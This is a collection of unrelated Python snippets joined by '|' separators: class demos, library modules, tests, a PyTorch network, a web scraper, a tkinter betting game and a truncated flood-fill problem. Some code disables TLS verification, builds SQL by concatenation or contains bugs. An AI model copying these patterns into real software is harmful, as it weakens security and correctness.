# print(user1.age)
# user1.say_hi()
user1 = User("Joe", "Smith", 68)
user2 = User("Blanca", "Lopez", 41)
user2 = User("Yorp", "Urkl", 391)
mod1 = Moderator("x", "men", 0, 'comics')
mod1 = Moderator("mario", "bros", 0, 'video games')
print(User.display_active_user())
print(Moderator.display_active_mods())
# print(User.active_users)
# print(User.active_users)
# print(user2.logout())
# print(User.active_users)
|
# Princeton University licenses this file to You under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy of the License at:
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and limitations under the License.
# ********************************************* AdaptiveMechanism *****************************************************
"""
Overview
--------
An AdaptiveMechanism is a type of `Mechanism <Mechanisms>` that uses its input to modify the parameters of one or more
other PsyNeuLink components. In general, an AdaptiveMechanism receives its input from an `ObjectiveMechanism`, however
this need not be the case. There are two types of AdaptiveMechanism: `LearningMechanisms <LearningMechanism>`, that
modify the parameters of `MappingProjections <MappingProjection>`; and `ControlMechanisms <ControlMechanism>` that
modify the parameters of other ProcessingMechanisms. AdaptiveMechanisms are always executed after all
ProcessingMechanisms in the `process <Process>` or `system <System>` to which they belong have been
:ref:`executed <LINK>`, with all LearningMechanisms then executed before all ControlMechanisms. Both types of
AdaptiveMechanisms are executed before the next :ref:`round of execution <LINK>`, so that the modifications they make
are available during the next round of execution of the process or system.
.. _AdaptiveMechanism_Creation:
Creating an AdaptiveMechanism
------------------------------
An AdaptiveMechanism can be created by using the standard Python method of calling the constructor for the desired type.
AdaptiveMechanisms of the appropriate subtype are also created automatically when a :ref:`system
<System.System_Creation>` is created, and/or learning is specified for a :ref:`system <System.System_Learning>`,
a `process <Process_Learning>`, or any `projection <LearningProjection_Automatic_Creation>` within one. See the
documentation for the individual subtypes of AdaptiveMechanisms for more specific information about how to create them.
.. _AdaptiveMechanism_Structure:
Structure
---------
An AdaptiveMechanism has the same basic structure as a `Mechanism <Mechanisms>`. See the documentation for
individual subtypes of AdaptiveMechanism for more specific information about their structure.
.. _Comparator_Execution:
Execution
---------
An AdaptiveMechanism always executes after execution of all of the ProcessingMechanisms in the process or system to
which it belongs. All of the `LearningMechanisms <LearningMechanism>` are then executed, followed by all of the
`ControlMechanisms <ControlMechanism>`.
"""
from PsyNeuLink.Components.Mechanisms.Mechanism import *
from PsyNeuLink.Components.ShellClasses import *
class AdpativeMechanismError(Exception):
def __init__(self, error_value):
self.error_value = error_value
class AdaptiveMechanism_Base(Mechanism_Base):
# IMPLEMENT: consider moving any properties of adaptive mechanisms not used by control mechanisms to here
"""An AdaptiveMechanism is a Type of the `Mechanism <Mechanism>` Category of Component
"""
componentType = "AdaptiveMechanism"
classPreferenceLevel = PreferenceLevel.TYPE
# Any preferences specified below will override those specified in TypeDefaultPreferences
# Note: only need to specify setting; level will be assigned to TYPE automatically
# classPreferences = {
# kwPreferenceSetName: 'AdaptiveMechanismClassPreferences',
# kp<pref>: <setting>...}
# variableClassDefault = defaultControlAllocation
# This must be a list, as there may be more than one (e.g., one per controlSignal)
variableClassDefault = defaultControlAllocation
def __init__(self,
variable=None,
params=None,
name=None,
prefs=None,
context=None):
"""Abstract class for AdaptiveMechanism
"""
self.system = None
super().__init__(variable=variable,
params=params,
name=name,
prefs=prefs,
context=context) |
import os
dir = "/home/tarena/FTP"
res = 0
q1 = os.path.getsize("/home/tarena/FTP/exercise01.py")
q2 = os.path.getsize("/home/tarena/FTP/pool.py")
q3 = q1+q2
print(q3)
|
# -*- coding: utf-8 -*-
'''
Created on 7 may. 2017
@author: jose
'''
import time
class objSi(object):
'''
classdocs
'''
def __init__(self, _id='',id_si=0,id_sw=0,id_serv=0,id_entorno='PRO',version='',ip='',user='',home=''):
'''
Constructor
'''
self._id=_id
self.id_si=id_si
self.id_sw=id_sw
self.id_serv=id_serv
self.id_entorno=id_entorno
self.version=version
self.home=home
self.ip = ip
self.user=user
self.dic_si={}
return
def cargaSoftware(self,conn):
dic={}
sql = 'select id_entorno,version,home,usuario,deleted,_id from tb_softwareinstancia where id_si='+str(self.id_si)
lsi=conn.consulta(sql)
dic['entorno']=lsi[0][0]
dic['version']=lsi[0][1]
dic['home']=lsi[0][2]
dic['usuario']=lsi[0][3]
dic['deleted']=False if lsi[0][4] == None else lsi[0][4]
self.dic_si=dic
return dic
def actualizaInstancia(self, id_si,conn):
modificado=False
di = conn.retInstanciaSW(id_si)
data = (self.version.encode('ascii','ignore'),self.home,self.user,self.id_entorno)
if data <> di :
sql ="update tb_softwareinstancia set version=%s, home=%s,usuario=%s,id_entorno=%s, fsync='"+time.strftime("%c")+"' where id_si="+str(id_si)
conn.actualizaTabla(sql,data)
modificado =True
return modificado
def grabaBBDD(self,conn):
data=(self.id_sw,self.id_serv,self.id_entorno,self.version,self.home,self.user,time.strftime("%c"))
sql = 'insert into tb_softwareinstancia (id_sw,id_serv,id_entorno,version,home,usuario,fsync) values (%s,%s,%s,%s,%s,%s,%s)'
self.id_si=conn.actualizaTabla(sql,data)
return self.id_si
|
#coding:utf-8
#判断一个实例对象是否是某个类型(即由谁实例化)或者是否继承于某个类(即实例对象的原型)
from collections import Iterable
class Person:
pass
p1 = Person()
print(isinstance(p1,Person)) #True,类型
print(isinstance(p1,object)) #True,原型
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest.serialization import Model
class ProcessPromoteStatus(Model):
"""ProcessPromoteStatus.
:param complete:
:type complete: int
:param id:
:type id: str
:param message:
:type message: str
:param pending:
:type pending: int
:param remaining_retries:
:type remaining_retries: int
:param successful:
:type successful: bool
"""
_attribute_map = {
'complete': {'key': 'complete', 'type': 'int'},
'id': {'key': 'id', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'pending': {'key': 'pending', 'type': 'int'},
'remaining_retries': {'key': 'remainingRetries', 'type': 'int'},
'successful': {'key': 'successful', 'type': 'bool'}
}
def __init__(self, complete=None, id=None, message=None, pending=None, remaining_retries=None, successful=None):
super(ProcessPromoteStatus, self).__init__()
self.complete = complete
self.id = id
self.message = message
self.pending = pending
self.remaining_retries = remaining_retries
self.successful = successful
|
import unittest
from selenium import webdriver
class IndexPageTest(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.get('http://localhost:5000/index')
def test_index_title_display(self):
self.assertIn("Kai", self.driver.title)
def test_table_display(self):
elem = self.driver.find_element_by_name('city_info')
assert elem.is_displayed()
def test_valid_health(self):
table = self.driver.find_element_by_name('city_info')
# Go through all headers, find which one displays health of City
for i, e in enumerate(table.find_elements_by_tag_name('th')):
if e.text == 'Health':
health_column = i
break
# for each row check if health is valid
for i, row in enumerate(table.find_elements_by_css_selector('tr')):
if i == 0:
# skip the first row, its the header, not sure why tr selects it
continue
col = row.find_elements_by_css_selector('td')[health_column]
health = int(col.text)
assert 0 < health <= 30
def tearDown(self):
self.driver.close()
if __name__ == '__main__':
# ignore warnings because of ResourceWarning when running with chrome
# https://stackoverflow.com/questions/20885561/warning-from-warnings-module-resourcewarning-unclosed-socket-socket-object
unittest.main(warnings='ignore')
|
def decorate_1(func):
print("----开始装饰------")
def inner():
print("----使用方法---{}".format(func()))
return inner
k1 = decorate_1(10)
print(k1)
@decorate_1
def test_dec():
print("----测试用的")
#k2 = K1(20)
test_dec()
#print(k2) |
import torch
from torch.autograd import Variable
from torch.autograd import Function
from torch.autograd import gradcheck
import math
import numpy as np
import torch.nn as nn
import os
import scipy.io as sio
def A(input, index):
input_ = torch.reshape(input.t(), (-1, 1))
A_ = input_[index]
return A_
def At(input, index, addmatrix):
number = torch.numel(addmatrix)
size = addmatrix.size()
output = torch.zeros(number, 1).cuda()
output[index] = input
Ainput = torch.reshape(output, size).t()
return Ainput
def A_Gaussian(input, GA):
return (GA.cuda()).mm(torch.reshape(input, (-1, 1)))
def At_Gaussian(input, GA):
return torch.reshape(((GA.cuda()).t()).mm(input), (128,128))
def simple_batch_norm_1d(x, gamma, beta):
eps = 1e-5
x_mean = torch.mean(x)
x_var = torch.mean((x - x_mean) ** 2)
x_hat = (x - x_mean) / torch.sqrt(x_var + eps)
return gamma.view_as(x_mean) * x_hat + beta.view_as(x_mean)
class input_layer(nn.Module):
def __init__(self, in_features, out_features, indexs):
super(input_layer, self).__init__()
self.indexs = indexs
self.u = nn.Parameter((in_features*out_features/len(indexs))*torch.ones(1, 1))
self.a = nn.Parameter(0.1*torch.ones(1, 1)) #approximate divergence of alpha
self.c = nn.Parameter(1*torch.ones(1, 1))
# self.gamma = nn.Parameter(0.1 * torch.ones(1, 1))
# self.beta = nn.Parameter(0.1 * torch.ones(1, 1))
self.register_buffer('L0', torch.zeros(in_features, out_features))
def forward(self, inputs):
y, r, GA = inputs
G = At_Gaussian(y - A_Gaussian(self.L0, GA), GA)
R = self.L0 + self.u * G
u, s, v = torch.svd(R)
v1=v.t()
Z=torch.mm(torch.mm(u[:,0:r], torch.diag(s[0:r])), v1[0:r,:])
Lo= self.c * Z - self.a * R
# Lolist=[Lo]
return [Lo, GA, y, r]
# return [Lo, y, r, Lolist]
class hidden_layer(nn.Module):
# def __init__(self, in_features, out_features, indexs):
def __init__(self, in_features, out_features, indexs, u, a, c):
super(hidden_layer, self).__init__()
self.indexs = indexs
self.in_features = in_features
self.out_features = out_features
# self.u = nn.Parameter(0.5*torch.ones(1, 1))
# self.a = nn.Parameter(0.1*torch.ones(1, 1))
# self.c = nn.Parameter(0.5*torch.ones(1, 1))
self.u=nn.Parameter(u)
self.a=nn.Parameter(a)
self.c=nn.Parameter(c)
# self.gamma = nn.Parameter(0.1 * torch.ones(1, 1))
# self.beta = nn.Parameter(0.1 * torch.ones(1, 1))
def forward(self, inputs):
Lo, GA, y, r = inputs
G = At_Gaussian(y - A_Gaussian(Lo, GA), GA)
# G = At(y - A(Lo, self.indexs), self.indexs, Lo)
err = (1e-6) * (torch.eye(self.in_features, self.in_features).cuda())
R = Lo + self.u * G
"SBDSDC"
R = R + err
u, s, v = torch.svd(R)
v1=v.t()
Z=torch.mm(torch.mm(u[: , 0:r], torch.diag(s[0:r])), v1[0:r , :])
Lo= self.c * Z - self.a * R
# Lolist.append(Lo)
return [Lo, GA, y, r]
# for name, param in per.named_parameters():
# print(name, param.size())
|
# Here we will handle different errors
# this will help us to understand the problems of our neural network better
import sys
ERROR_ARRAY_SIZES = 0
ERROR_ARRAY_SIZES_MSG = "Error: array sizes don't match "
def error(e, extra_explanation=None):
if e == ERROR_ARRAY_SIZES:
error_arrays_sizes(extra_explanation)
def error_arrays_sizes(extra_explanation=None):
sys.exit(ERROR_ARRAY_SIZES_MSG + ": " + extra_explanation)
|
import requests
import json
import os
current_dir = os.path.dirname(__file__)
class PatentMenuGetter():
def __init__(self):
self.base_url = "https://worldwide.espacenet.com/3.2/rest-services/search?lang=en%2Cde%2Cfr&q=A61K38%2F00&qlang=cql&p_s=espacenet&p_q=A61K38%2F00"
self.headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
'Content-Type': 'application/json',
#'EPO-Trace-Id': 's347yb-89q317-AAA-000000',
'X-EPO-PQL-Profile': 'cpci',
'Origin': 'https://worldwide.espacenet.com',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty'
}
def request(self, param, data):
session = requests.session()
url = self.base_url
session.head("https://worldwide.espacenet.com/patent/?EPOTraceID=igd8d7-u7u4s5&event=onSearchSubmit_adv-off&lgCC=en_EP&listView=text-only")
response = session.post(url, headers=self.headers, data=json.dumps(data), verify=False)
print(response.text)
if __name__ == '__main__':
with open(os.path.join(current_dir, "tests", "resources", "menu_get_parameter.json"), 'r', encoding="utf8") as f:
request_parameter = "".join(f.readlines())
parameter = json.loads(request_parameter)
getter = PatentMenuGetter()
getter.request("A61K38%2F00", parameter)
|
from practice.models import City, RecentSearch
from practitioner.models import Specialization
def updateRecentSearches(city, spec):
if city != '' and spec != '':
citi = City.objects.get(slug=city)
speciality = Specialization.objects.get(slug=spec)
try:
obj = RecentSearch.objects.get(city=citi, speciality=speciality)
obj.hit_count+=1
obj.save()
except:
obj = RecentSearch.objects.create(city=citi, speciality=speciality, hit_count=1)
def get_review_details(reviews):
answers_avg = {'anw1':0,'anw2':0,'anw3':0,'anw4':0,'anw5':0, 'num_of_reviews':len(reviews)}
total = 0
for review in reviews:
answers_avg['anw1'] = answers_avg['anw1'] + review.answers.answer1
answers_avg['anw2'] = answers_avg['anw2'] + review.answers.answer2
answers_avg['anw3'] = answers_avg['anw3'] + review.answers.answer3
answers_avg['anw4'] = answers_avg['anw4'] + review.answers.answer4
answers_avg['anw5'] = answers_avg['anw5'] + review.answers.answer5
for i in range(1,6):
if len(reviews):
answers_avg['anw'+str(i)] = answers_avg['anw'+str(i)] / len(reviews)
total = total + answers_avg['anw'+str(i)]
answers_avg['total'] = total/5
return answers_avg
|
# 平滑图像
# 目标
#
# 在本教程中:
#
# 用各种低通滤波器模糊图像。
# 对图像应用自定义过滤器(二维卷积)。
#二维卷积(图像滤波)
# 将该内核保持在一个像素之上,将该内核下面的所有 25 个像素相加,取其平均值,
# 并用新的平均值替换中心像素。它继续对图像中的所有像素执行此操作。尝试此代码并检查结果:
import numpy as np
import cv2 as cv
from matplotlib import pyplot as plt
img = cv.imread('./images/test.jpg')
kernel = np.ones((5, 5), np.float32)/25
dst = cv.filter2D(img, -1, kernel)
plt.subplot(121)
plt.imshow(img)
plt.title('Original')
plt.xticks([])
plt.yticks([])
plt.subplot(122)
plt.imshow(dst)
plt.title('Averaging')
plt.xticks([])
plt.yticks([])
plt.show()
#图像模糊(图像平滑)
#1平均化
#这是通过用一个标准化的框过滤器卷积图像来完成的。它只需取内核区域下所有像素的平均值并替换中心元素。这是通过函数 **cv.blur()
img_3_1 = cv.imread('./images/test.jpg')
img_3_1 = img_3_1[:, :, [2, 1, 0]]
blur = cv.blur(img_3_1, (5, 5))
plt.subplot(121)
plt.imshow(img_3_1)
plt.title('Original')
plt.xticks([])
plt.yticks([])
plt.subplot(122)
plt.imshow(blur)
plt.title('Blurrde')
plt.xticks([])
plt.yticks([])
plt.show()
cv.imshow(img_3_1)
#高斯模糊
blur = cv.GaussianBlur(img,(5,5),0)
#中值滤波
median = cv.medianBlur(img,5)
#双边滤波
blur = cv.bilateralFilter(img,9,75,75)
|
from tkinter import *
from time import sleep
root = Tk()
##################Betting##########
def betH1():
global totalMoney,H1bets
if totalMoney>0:
totalMoney=totalMoney-1
lb.config(text=("£" + str(totalMoney)))
H1bets=H1bets+1
lb1.config(text=("£" + str(H1bets)))
else:
w1.config(text=("No more bets"))
def betH2():
global totalMoney,H2bets
if totalMoney>0:
totalMoney=totalMoney-1
lb.config(text=("£" + str(totalMoney)))
H2bets=H2bets+1
lb2.config(text=("£" + str(H2bets)))
else:
w1.config(text=("No more bets"))
def betH3():
global totalMoney,H3bets
if totalMoney>0:
totalMoney=totalMoney-1
lb.config(text=("£" + str(totalMoney)))
H3bets=H3bets+1
lb3.config(text=("£" + str(H3bets)))
else:
w1.config(text=("No more bets"))
def betH4():
global totalMoney,H4bets
if totalMoney>0:
totalMoney=totalMoney-1
lb.config(text=("£" + str(totalMoney)))
H4bets=H4bets+1
lb4.config(text=("£" + str(H4bets)))
else:
w1.config(text=("No more bets"))
def betH5():
global totalMoney,H5bets
if totalMoney>0:
totalMoney=totalMoney-1
lb.config(text=("£" + str(totalMoney)))
H5bets=H5bets+1
lb5.config(text=("£" + str(H5bets)))
else:
w1.config(text=("No more bets"))
def betH6():
global totalMoney,H6bets
if totalMoney>0:
totalMoney=totalMoney-1
lb.config(text=("£" + str(totalMoney)))
H6bets=H6bets+1
lb6.config(text=("£" + str(H6bets)))
else:
w1.config(text=("No more bets"))
##################Betting##########
######Pleyer 2########
def pbetH1():
global ptotalMoney,pH1bets
if ptotalMoney>0:
ptotalMoney=ptotalMoney-1
plb.config(text=("£" + str(ptotalMoney)))
pH1bets=pH1bets+1
plb1.config(text=("£" + str(pH1bets)))
else:
w1.config(text=("No more bets"))
def pbetH2():
global ptotalMoney,pH2bets
if ptotalMoney>0:
ptotalMoney=ptotalMoney-1
plb.config(text=("£" + str(ptotalMoney)))
pH2bets=pH2bets+1
plb2.config(text=("£" + str(pH2bets)))
else:
w1.config(text=("No more bets"))
def pbetH3():
global ptotalMoney,pH3bets
if ptotalMoney>0:
ptotalMoney=ptotalMoney-1
plb.config(text=("£" + str(ptotalMoney)))
pH3bets=pH3bets+1
plb3.config(text=("£" + str(pH3bets)))
else:
w1.config(text=("No more bets"))
def pbetH4():
global ptotalMoney,pH4bets
if ptotalMoney>0:
ptotalMoney=ptotalMoney-1
plb.config(text=("£" + str(ptotalMoney)))
pH4bets=pH4bets+1
plb4.config(text=("£" + str(pH4bets)))
else:
w1.config(text=("No more bets"))
def pbetH5():
global ptotalMoney,pH5bets
if ptotalMoney>0:
ptotalMoney=ptotalMoney-1
plb.config(text=("£" + str(ptotalMoney)))
pH5bets=pH5bets+1
plb5.config(text=("£" + str(pH5bets)))
else:
w1.config(text=("No more bets"))
def pbetH6():
global ptotalMoney,pH6bets
if ptotalMoney>0:
ptotalMoney=ptotalMoney-1
plb.config(text=("£" + str(ptotalMoney)))
pH6bets=H6bets+1
plb6.config(text=("£" + str(pH6bets)))
else:
w1.config(text=("No more bets"))
################################################
def resetBets():
global H1bets,H2bets,H3bets,H4bets,H5bets,H6bets,pH1bets,pH2bets,pH3bets,pH4bets,pH5bets,pH6bets
H1bets=0
lb1.config(text=("£" + str(H1bets)))
H2bets=0
lb2.config(text=("£" + str(H2bets)))
H3bets=0
lb3.config(text=("£" + str(H3bets)))
H4bets=0
lb4.config(text=("£" + str(H4bets)))
H5bets=0
lb5.config(text=("£" + str(H5bets)))
H6bets=0
lb6.config(text=("£" + str(H6bets)))
pH1bets=0
plb1.config(text=("£" + str(pH1bets)))
pH2bets=0
plb2.config(text=("£" + str(pH2bets)))
pH3bets=0
plb3.config(text=("£" + str(pH3bets)))
pH4bets=0
plb4.config(text=("£" + str(pH4bets)))
pH5bets=0
plb5.config(text=("£" + str(pH5bets)))
pH6bets=0
plb6.config(text=("£" + str(pH6bets)))
def repayMoney(w):
global ptotalMoney,totalMoney,H1bets,H2bets,H3bets,H4bets,H5bets,H6bets,pH1bets,pH2bets,pH3bets,pH4bets,pH5bets,pH6bets
if w == 1:
totalMoney = totalMoney+(H1bets*2)
ptotalMoney = ptotalMoney+(pH1bets*2)
resetBets()
resetAllHorses()
elif w==2:
totalMoney=totalMoney+(H2bets*2)
ptotalMoney = ptotalMoney+(pH2bets*2)
resetBets()
resetAllHorses()
elif w==3:
totalMoney=totalMoney+(H3bets*2)
ptotalMoney = ptotalMoney+(pH3bets*2)
resetBets()
resetAllHorses()
elif w==4:
totalMoney=totalMoney+(H4bets*2)
ptotalMoney = ptotalMoney+(pH4bets*2)
resetBets()
resetAllHorses()
elif w==5:
totalMoney=totalMoney+(H5bets*2)
ptotalMoney = ptotalMoney+(pH5bets*2)
resetBets()
resetAllHorses()
elif w==6:
totalMoney=totalMoney+(H6bets*2)
ptotalMoney = ptotalMoney+(pH6bets*2)
resetBets()
resetAllHorses()
lb.config(text=("£" + str(totalMoney)))
plb.config(text=("£" + str(ptotalMoney)))
##################Betting##########
##################Reset Horses Position##########
def resetAllHorses():
canvas1.coords(firstHorse,x, y+(laneWidth*0))
canvas1.coords(secondHorse,x, y+(laneWidth*1))
canvas1.coords(thirdHorse,x, y+(laneWidth*2))
canvas1.coords(fourthHorse,x, y+(laneWidth*3))
canvas1.coords(fithHorse,x, y+(laneWidth*4))
canvas1.coords(sixthHorse,x, y+(laneWidth*5))
##################Reset Horses Position##########
def gameNotStarted():
generic=True
def enableOrDisableButtons(x):
if x == "disable":
b1.config(state=DISABLED)
b2.config(state=DISABLED)
b3.config(state=DISABLED)
b4.config(state=DISABLED)
b5.config(state=DISABLED)
b6.config(state=DISABLED)
pb1.config(state=DISABLED)
pb2.config(state=DISABLED)
pb3.config(state=DISABLED)
pb4.config(state=DISABLED)
pb5.config(state=DISABLED)
pb6.config(state=DISABLED)
elif x=="enable":
b1.config(state=NORMAL)
b2.config(state=NORMAL)
b3.config(state=NORMAL)
b4.config(state=NORMAL)
b5.config(state=NORMAL)
b6.config(state=NORMAL)
pb1.config(state=NORMAL)
pb2.config(state=NORMAL)
pb3.config(state=NORMAL)
pb4.config(state=NORMAL)
pb5.config(state=NORMAL)
pb6.config(state=NORMAL)
def startGame():
global gameStarted,h1X,h2X,h3X,h4X,h5X,h6X
h1X=0
h2X=0
h3X=0
h4X=0
h5X=0
h6X=0
enableOrDisableButtons("disable")
gameStarted=True
sleep(0.1)
w1.config(text=("Race in progress"))
def eachButtonPress():
global gameStarted,h1X,h2X,h3X,h4X,h5X,h6X
####print (h1X,h2X,h3X,h4X,h5X,h6X)
if gameStarted==True:
w1.config(text=("Race in progress"))
if h1X>1120:
gameStarted=False
w1.config(text=("Horse 1 Wins"))
h1X=0
repayMoney(1)
enableOrDisableButtons("enable")
if h2X>1120:
gameStarted=False
w1.config(text=("Horse 2 Wins"))
h2X=0
repayMoney(2)
enableOrDisableButtons("enable")
if h3X>1120:
gameStarted=False
w1.config(text=("Horse 3 Wins"))
h3X=0
repayMoney(3)
enableOrDisableButtons("enable")
if h4X>1120:
gameStarted=False
w1.config(text=("Horse 4 Wins"))
h4X=0
repayMoney(4)
enableOrDisableButtons("enable")
if h5X>1120:
gameStarted=False
w1.config(text=("Horse 5 Wins"))
h5X=0
repayMoney(5)
enableOrDisableButtons("enable")
if h6X>1120:
gameStarted=False
w1.config(text=("Horse 6 Wins"))
h6X=0
repayMoney(6)
enableOrDisableButtons("enable")
def resetValues():
global h1X,h2X,h3X,h4X,h5X,h6X,gameStarted,totalMoney,H1bets,H2bets,H3bets,H4bets,H5bets,H6bets, winner
global ptotalMoney,pH1bets,pH2bets,pH3bets,pH4bets,pH5bets,pH6bets
h1X=0
h2X=0
h3X=0
h4X=0
h5X=0
h6X=0
H1bets=0
H2bets=0
H3bets=0
H4bets=0
H5bets=0
H6bets=0
pH1bets=0
pH2bets=0
pH3bets=0
pH4bets=0
pH5bets=0
pH6bets=0
gameStarted=False
ptotalMoney=10
totalMoney=10
winner=False
def horse1move(event):
global h1X, winner
if gameStarted==True:
canvas1.move(firstHorse, 20, 0)
h1X = h1X+20
#print(canvas1.coords(firstHorse))
eachButtonPress()
else:
gameNotStarted()
eachButtonPress()
def horse2move(event):
global h2X
if gameStarted==True:
canvas1.move(secondHorse, 20, 0)
h2X = h2X+20
eachButtonPress()
else:
gameNotStarted()
eachButtonPress()
def horse3move(event):
global h3X
if gameStarted==True:
canvas1.move(thirdHorse, 20, 0)
h3X = h3X+20
eachButtonPress()
else:
gameNotStarted()
eachButtonPress()
def horse4move(event):
global h4X
if gameStarted==True:
canvas1.move(fourthHorse, 20, 0)
h4X = h4X+20
eachButtonPress()
else:
gameNotStarted()
eachButtonPress()
def horse5move(event):
global h5X
if gameStarted==True:
canvas1.move(fithHorse, 20, 0)
h5X = h5X+20
eachButtonPress()
else:
gameNotStarted()
eachButtonPress()
def horse6move(event):
global h6X
if gameStarted==True:
canvas1.move(sixthHorse, 20, 0)
h6X = h6X+20
eachButtonPress()
else:
gameNotStarted()
eachButtonPress()
####
image1 = r".\Horses\Horse1.gif"
photo1 = PhotoImage(file=image1)
image2 = r".\Horses\Horse2.gif"
photo2 = PhotoImage(file=image2)
image3 = r".\Horses\Horse3.gif"
photo3 = PhotoImage(file=image3)
image4 = r".\Horses\Horse4.gif"
photo4 = PhotoImage(file=image4)
image5 = r".\Horses\Horse5.gif"
photo5 = PhotoImage(file=image5)
image6 = r".\Horses\Horse6.gif"
photo6 = PhotoImage(file=image6)
####
####BACKGROUND######
bimage1 = r".\background.gif"
bphoto1 = PhotoImage(file=bimage1)
bwidth1 = bphoto1.width()
bheight1 = bphoto1.height()
bx=(bwidth1)/2
by=(bheight1)/2
####BACKGROUND######
screen_width = root.winfo_screenwidth()
screen_height = root.winfo_screenheight()
canvas1 = Canvas(width=bwidth1,height=bheight1)#Canvas(width=screen_width, height=screen_height)
canvas1.grid(row = 1, column = 2, rowspan=12,columnspan=10)
horseHeight = photo1.height()
horseWidth = photo1.width()
x = horseHeight/2
y = horseWidth/2
#To add 1/6 of the background height
laneWidth=0
laneWidth=(bheight1/6)
backgound = canvas1.create_image(bx, by, image=bphoto1)
firstHorse = canvas1.create_image(x, y+(laneWidth*0), image=photo1)
secondHorse = canvas1.create_image(x, (y+(laneWidth*1)), image=photo2)
thirdHorse = canvas1.create_image(x, (y+(laneWidth*2)), image=photo3)
fourthHorse = canvas1.create_image(x, (y+(laneWidth*3)), image=photo4)
fithHorse = canvas1.create_image(x, (y+(laneWidth*4)), image=photo5)
sixthHorse = canvas1.create_image(x, (y+(laneWidth*5)), image=photo6)
root.bind('1', horse1move)
root.bind('2', horse2move)
root.bind('3', horse3move)
root.bind('8', horse4move)
root.bind('9', horse5move)
root.bind('0', horse6move)
resetValues()
fontforbets="Sans 20"
b1=Button(text="Bet Win (Key1)",command=betH1)
b1.grid(row = 1, column = 0)
lb1 = Label(root, text="£" + str(H1bets),font = fontforbets)
lb1.grid(row=2,column=0)
b2=Button(text="Bet Win (Key2)",command=betH2)
b2.grid(row = 3, column = 0)
lb2 = Label(root, text="£" +str(H2bets),font = fontforbets)
lb2.grid(row=4,column=0)
b3=Button(text="Bet Win (Key3)",command=betH3)
b3.grid(row = 5, column = 0)
lb3 = Label(root, text="£" +str(H3bets),font = fontforbets)
lb3.grid(row=6,column=0)
b4=Button(text="Bet Win (Key8)",command=betH4)
b4.grid(row = 7, column = 0)
lb4 = Label(root, text="£" +str(H4bets),font = fontforbets)
lb4.grid(row=8,column=0)
b5=Button(text="Bet Win (Key9)",command=betH5)
b5.grid(row = 9, column = 0)
lb5 = Label(root, text="£" +str(H5bets),font = fontforbets)
lb5.grid(row=10,column=0)
b6=Button(text="Bet Win (Key0)",command=betH6)
b6.grid(row = 11, column = 0)
lb6 = Label(root, text="£" +str(H6bets),font = fontforbets)
lb6.grid(row=12,column=0)
################
pb1=Button(text="Bet Win (Key1)",command=pbetH1)
pb1.grid(row = 1, column = 1)
plb1 = Label(root, text="£" + str(pH1bets),font = fontforbets)
plb1.grid(row=2,column=1)
pb2=Button(text="Bet Win (Key2)",command=pbetH2)
pb2.grid(row = 3, column = 1)
plb2 = Label(root, text="£" +str(pH2bets),font = fontforbets)
plb2.grid(row=4,column=1)
pb3=Button(text="Bet Win (Key3)",command=pbetH3)
pb3.grid(row = 5, column = 1)
plb3 = Label(root, text="£" +str(pH3bets),font = fontforbets)
plb3.grid(row=6,column=1)
pb4=Button(text="Bet Win (Key8)",command=pbetH4)
pb4.grid(row = 7, column = 1)
plb4 = Label(root, text="£" +str(pH4bets),font = fontforbets)
plb4.grid(row=8,column=1)
pb5=Button(text="Bet Win (Key9)",command=pbetH5)
pb5.grid(row = 9, column = 1)
plb5 = Label(root, text="£" +str(pH5bets),font = fontforbets)
plb5.grid(row=10,column=1)
pb6=Button(text="Bet Win (Key0)",command=pbetH6)
pb6.grid(row = 11, column = 1)
plb6 = Label(root, text="£" +str(pH6bets),font = fontforbets)
plb6.grid(row=12,column=1)
###################
play= Button(text=("Play Game!"),font = "Helvetica 15 bold italic",command=startGame)
play.grid(row=0,column=0,columnspan=2)
w1 = Label(root, text="Please place bets",font = "Helvetica 30 bold italic")
w1.grid(row=0,column=2)
w2 = Label(root, text="p1 Balance:",font = "Calibri 25 bold")
w2.grid(row=0,column=3)
lb = Label(root,text= ("£" + str(totalMoney)),font = "Calibri 20")
lb.grid(row=0,column=4)
pw2 = Label(root, text="p2 Balance:",font = "Calibri 25 bold")
pw2.grid(row=0,column=5)
plb = Label(root,text= ("£" + str(ptotalMoney)),font = "Calibri 20")
plb.grid(row=0,column=6)
root.mainloop()
|
# -*- coding: utf-8 -*-
# @Time : 2018/11/15 14:41
# @Author : lishanshan
import unittest
from ddt import ddt, file_data
@ddt
class Testjson(unittest.TestCase):
def setUp(self):
pass
@file_data('E:/脚本/Test_study/unittest/ddt_study_data/test_data_list.json')
def testlist(self,value):
print(value)
@file_data('E:/脚本/Test_study/unittest/ddt_study_data/test_data_dict.json')
def testdict(self,value):
print(value)
if __name__ == '__main__':
unittest.main() |
"""
The `magpylib.display.plotly` sub-package provides useful functions for
convenient creation of 3D traces for commonly used objects in the
library.
"""
__all__ = [
"make_Arrow",
"make_Ellipsoid",
"make_Pyramid",
"make_Cuboid",
"make_CylinderSegment",
"make_Prism",
"make_Tetrahedron",
"make_TriangularMesh",
]
from magpylib._src.display.traces_base import (
make_Arrow,
make_Ellipsoid,
make_Pyramid,
make_Cuboid,
make_CylinderSegment,
make_Prism,
make_Tetrahedron,
make_TriangularMesh,
)
|
'''
Question:
733. Flood Fill
Descrition:
An image is represented by a 2-D array of integers, each integer representing the pixel value of the image (from 0 to 65535).
Given a coordinate (sr, sc) representing the starting pixel (row and column) of the flood fill, and a pixel value newColor, "flood fill" the image.
To perform a "flood fill", consider the starting pixel, plus any pixels connected 4-directionally to the starting pixel of the same color as the starting pixel,
plus any pixels connected 4-directionally to those pixels (also with the same color as the starting pixel), and so on.
